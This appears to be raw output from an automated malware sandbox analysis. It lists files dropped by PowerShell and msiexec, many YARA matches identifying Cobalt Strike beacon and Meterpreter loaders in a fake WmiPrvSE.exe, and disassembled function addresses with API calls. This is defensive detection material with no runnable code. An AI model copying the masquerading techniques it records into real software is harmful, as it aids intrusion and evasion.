                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77003E887FC21E505B9E28CBA30E18ED_8ACE642DC0A43382FABA7AE806561A50Jump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7850C7BAFAC9456B4B92328A61976502_9A7DD3DCFFDBC0C2959A4B4B65F6A3E1Jump to dropped file

                System Summary

                barindex
                Source: 23.2.WmiPrvSE.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                Source: 23.2.WmiPrvSE.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
                Source: 23.2.WmiPrvSE.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
                Source: 23.2.WmiPrvSE.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                Source: 23.2.WmiPrvSE.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
                Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
                Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
                Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
                Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
                Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
                Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
                Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
                Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
                Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
                Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
                Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
                Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
                Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
                Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
                Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
                Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
                Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
                Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
                Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
                Source: Process Memory Space: WmiPrvSE.exe PID: 7928, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                Source: Process Memory Space: WmiPrvSE.exe PID: 7928, type: MEMORYSTRMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                Source: Process Memory Space: WmiPrvSE.exe PID: 7928, type: MEMORYSTRMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB23C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,5_2_00007FF7BB23C2F0
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00771268 CreateProcessWithLogonW,GetLastError,23_2_00771268
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_0006C120 GetForegroundWindow,MessageBoxW,GetCurrentProcess,OpenProcessToken,CloseHandle,GetLastError,ExitWindowsEx,CloseHandle,4_2_0006C120
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\643ea8.msiJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3FB2.tmpJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4020.tmpJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4060.tmpJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4080.tmpJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI40BF.tmpJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI40EF.tmpJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{88D74BC3-DFDB-412A-9165-9910293F91BC}Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4304.tmpJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\643eab.msiJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\643eab.msiJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI44AA.tmpJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4577.tmpJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeFile created: C:\Windows\SystemTemp\AI_4A51.tmpJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeFile created: C:\Windows\SystemTemp\AI_4A51.ps1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77003E887FC21E505B9E28CBA30E18ED_8ACE642DC0A43382FABA7AE806561A50Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77003E887FC21E505B9E28CBA30E18ED_8ACE642DC0A43382FABA7AE806561A50Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\86844F70250DD8EF225D6B4178798C21_2CDE88B3CC9A35A2EA16DC0201366139Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\86844F70250DD8EF225D6B4178798C21_2CDE88B3CC9A35A2EA16DC0201366139Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7850C7BAFAC9456B4B92328A61976502_9A7DD3DCFFDBC0C2959A4B4B65F6A3E1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7850C7BAFAC9456B4B92328A61976502_9A7DD3DCFFDBC0C2959A4B4B65F6A3E1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EF7234CDBB1649702229F955C785C39FJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EF7234CDBB1649702229F955C785C39FJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\49855FCDFA62840A2838AEF1EFAC3C9BJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\49855FCDFA62840A2838AEF1EFAC3C9BJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI3FB2.tmpJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_0009C0604_2_0009C060
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_0006A7B04_2_0006A7B0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_0006B8304_2_0006B830
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000D63774_2_000D6377
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000E83A94_2_000E83A9
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_0006E5E04_2_0006E5E0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000BC5F04_2_000BC5F0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000DE6604_2_000DE660
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000D27204_2_000D2720
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_0006E8304_2_0006E830
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000C69504_2_000C6950
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000616C04_2_000616C0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000B2C804_2_000B2C80
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000C6D504_2_000C6D50
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_0008CD604_2_0008CD60
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000B6E404_2_000B6E40
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000C6EF04_2_000C6EF0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000C0F804_2_000C0F80
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000C50D04_2_000C50D0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000C51F04_2_000C51F0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000C32304_2_000C3230
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000C32D04_2_000C32D0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000E13E94_2_000E13E9
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000DF57D4_2_000DF57D
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000657704_2_00065770
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000B19004_2_000B1900
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_0008B9904_2_0008B990
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_0008BAA04_2_0008BAA0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000BDCB04_2_000BDCB0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_00081D004_2_00081D00
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_0008FD804_2_0008FD80
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000C7DB04_2_000C7DB0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000D5FE94_2_000D5FE9
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB2449285_2_00007FF7BB244928
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB23F9305_2_00007FF7BB23F930
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB251F205_2_00007FF7BB251F20
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB235E245_2_00007FF7BB235E24
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB25CE885_2_00007FF7BB25CE88
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB2534845_2_00007FF7BB253484
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB24A4AC5_2_00007FF7BB24A4AC
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB25B1905_2_00007FF7BB25B190
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB2607545_2_00007FF7BB260754
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB268C1C5_2_00007FF7BB268C1C
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB24BB905_2_00007FF7BB24BB90
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB245B605_2_00007FF7BB245B60
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB254B985_2_00007FF7BB254B98
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB241A485_2_00007FF7BB241A48
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB26FA945_2_00007FF7BB26FA94
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB252AB05_2_00007FF7BB252AB0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB231AA45_2_00007FF7BB231AA4
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB275AF85_2_00007FF7BB275AF8
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB24C96C5_2_00007FF7BB24C96C
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB2539645_2_00007FF7BB253964
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB2689A05_2_00007FF7BB2689A0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB2720805_2_00007FF7BB272080
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB24AF185_2_00007FF7BB24AF18
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB252D585_2_00007FF7BB252D58
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB258DF45_2_00007FF7BB258DF4
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB2607545_2_00007FF7BB260754
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB2553F05_2_00007FF7BB2553F0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB2372885_2_00007FF7BB237288
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB24126C5_2_00007FF7BB24126C
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB23A3105_2_00007FF7BB23A310
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB23C2F05_2_00007FF7BB23C2F0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB24F1805_2_00007FF7BB24F180
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB2521D05_2_00007FF7BB2521D0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB26C8385_2_00007FF7BB26C838
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB2348405_2_00007FF7BB234840
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB2376C05_2_00007FF7BB2376C0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB2725505_2_00007FF7BB272550
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB24B5345_2_00007FF7BB24B534
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_001C591423_2_001C5914
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_001C192823_2_001C1928
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_001A916C23_2_001A916C
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_001C126423_2_001C1264
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_001CAAB023_2_001CAAB0
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_001B033423_2_001B0334
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_001C037423_2_001C0374
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_001C239C23_2_001C239C
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_001CC39723_2_001CC397
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_001BF5A823_2_001BF5A8
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_001CE60023_2_001CE600
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_001ACE3C23_2_001ACE3C
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_001A968023_2_001A9680
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_001CC68023_2_001CC680
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_001B6F3823_2_001B6F38
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_001CB7B023_2_001CB7B0
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_001CCFF023_2_001CCFF0
